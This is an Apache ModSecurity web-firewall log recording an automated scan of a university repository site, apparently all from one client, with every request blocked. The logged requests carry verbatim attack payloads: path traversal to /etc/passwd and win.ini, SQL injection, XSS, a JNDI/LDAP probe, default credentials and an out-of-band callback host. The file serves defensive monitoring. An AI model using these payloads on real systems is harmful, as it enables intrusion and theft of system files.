[Tue Aug 29 11:44:23.571382 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22id\\x22:3,\\x22method\\x22:\\x22call\\x22,\\x22params\\x22:[\\x224183f72884a98d7952d953dd9439a1d1\\x22,\\x22file\\x22,\\x22read\\x22,{\\x22path\\x22:\\x22/etc/passwd\\x22}]}: {jsonrpc:2.0 id:3 method:call params:[4183f72884a98d7952d953dd9439a1d1 file read {path:/etc/passwd}]}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/ubus/"] [unique_id "ZO13p8Co-f0AAAe3@CIAAAAA"]
[Tue Aug 29 11:44:26.393707 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:k. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:k: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/blogroll-fun/blogroll.php"] [unique_id "ZO13qsCo-f0AAAgzyOIAAAAF"]
[Tue Aug 29 11:44:27.395561 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13q8Co-f0AAAfkzAkAAAAi"]
[Tue Aug 29 11:44:29.469377 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:link. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:link: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO13rcCo-f0AAAfZj5gAAAAN"]
[Tue Aug 29 11:44:32.477189 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/download.php"] [unique_id "ZO13sMCo-f0AAAfcoSIAAAAa"]
[Tue Aug 29 11:44:35.416644 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ())\\x09 found within ARGS:q: ')\\x09UNION\\x09SELECT\\x09*\\x09FROM\\x09(SELECT\\x09null)\\x09AS\\x09a1\\x09\\x09JOIN\\x09(SELECT\\x091)\\x09as\\x09u\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b1\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b2\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a3\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a4\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a5\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a6\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a7\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a8\\x09\\x09JOIN\\x09..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/api/v1/repos/search"] [unique_id "ZO13s8Co-f0AAAfg7zwAAAAe"]
[Tue Aug 29 11:44:36.461109 2023] [:error] [pid 2110] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g84dfc3jnb37tk.oast.site found within TX:1: cjmnbitjmimt14dgn26g84dfc3jnb37tk.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/composer/send_email"] [unique_id "ZO13tMCo-f0AAAg@--MAAAAQ"]
[Tue Aug 29 11:44:44.383358 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/mypixs/mypixs/downloadpage.php"] [unique_id "ZO13vMCo-f0AAAftVHEAAAAf"]
[Tue Aug 29 11:44:44.451204 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:name: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/jnoj/web/polygon/problem/viewfile"] [unique_id "ZO13vMCo-f0AAAc4EzwAAAAP"]
[Tue Aug 29 11:44:47.680035 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/spreadsheet-reader/test.php"] [unique_id "ZO13v8Co-f0AAAdxUiAAAAAC"]
[Tue Aug 29 11:44:47.681308 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:redirect: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO13v8Co-f0AAAg-pKQAAAAR"]
[Tue Aug 29 11:44:47.744703 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"public"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/api/v4/auth"] [unique_id "ZO13v8Co-f0AAAdxUiEAAAAC"]
[Tue Aug 29 11:44:48.384014 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:code: ../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/plus/carbuyaction.php"] [unique_id "ZO13wMCo-f0AAAfEBy8AAAAO"]
[Tue Aug 29 11:44:48.439815 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/nuovo/spreadsheet-reader/test.php"] [unique_id "ZO13wMCo-f0AAAfSWeYAAAAB"]
[Tue Aug 29 11:44:48.488539 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO13wMCo-f0AAAfSWegAAAAB"]
[Tue Aug 29 11:44:49.403575 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:url: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO13wcCo-f0AAAgzyQgAAAAF"]
[Tue Aug 29 11:44:51.491444 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13w8Co-f0AAAhISOsAAAAH"]
[Tue Aug 29 11:44:53.471999 2023] [:error] [pid 2124] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fullPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fullPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/fileDownload"] [unique_id "ZO13xcCo-f0AAAhMtU8AAAAM"]
[Tue Aug 29 11:44:55.492417 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: windows/win.ini\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13x8Co-f0AAAfg740AAAAe"]
[Tue Aug 29 11:44:56.375498 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13yMCo-f0AAAfSWg8AAAAB"]
[Tue Aug 29 11:44:56.572990 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:files[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:files[]: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php"] [unique_id "ZO13yMCo-f0AAAfZj@0AAAAN"]
[Tue Aug 29 11:44:57.489102 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13ycCo-f0AAAdOegsAAAAS"]
[Tue Aug 29 11:45:01.006854 2023] [:error] [pid 2110] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:filePath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/portal/attachment_downloadByUrlAtt.action"] [unique_id "ZO13zMCo-f0AAAg@ABcAAAAQ"]
[Tue Aug 29 11:45:02.436175 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAh4DWwAAAA2"]
[Tue Aug 29 11:45:03.391741 2023] [:error] [pid 2143] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: etc/passwd\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13z8Co-f0AAAhfdn0AAAAa"]
[Tue Aug 29 11:45:04.437202 2023] [:error] [pid 2159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130MCo-f0AAAhvjU8AAAAs"]
[Tue Aug 29 11:45:05.358643 2023] [:error] [pid 2160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:student_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:student_id: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/TransferredOutModal.php"] [unique_id "ZO130cCo-f0AAAhwxlcAAAAt"]
[Tue Aug 29 11:45:05.376346 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAh7wsEAAAA5"]
[Tue Aug 29 11:45:05.376805 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAdxUkIAAAAC"]
[Tue Aug 29 11:45:06.372794 2023] [:error] [pid 2169] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{\\r\\n   "type":"read",\\r\\n   "mbean":"java.lang:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x0d\\x0a   \\x22 found within ARGS:{\\x5cr\\x5cn   \\x22type\\x22:\\x22read\\x22,\\x5cr\\x5cn   \\x22mbean\\x22:\\x22java.lang:type: Memory\\x22,\\x0d\\x0a   \\x22target\\x22:{\\x0d\\x0a      \\x22url\\x22:\\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\\x22\\x0d\\x0a   }\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/jolokia/read/getDiagnosticOptions"] [unique_id "ZO130sCo-f0AAAh5RWEAAAA3"]
[Tue Aug 29 11:45:07.353583 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:patron_only_image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:patron_only_image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO1308Co-f0AAAh7wsYAAAA5"]
[Tue Aug 29 11:45:10.433715 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO131sCo-f0AAAfbkv4AAAAZ"]
[Tue Aug 29 11:45:11.393922 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO1318Co-f0AAAh13u0AAAAz"]
[Tue Aug 29 11:45:12.402820 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:id: ../../Conf/config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO132MCo-f0AAAdOeiIAAAAS"]
[Tue Aug 29 11:45:13.385045 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO132cCo-f0AAAhhcwMAAAAd"]
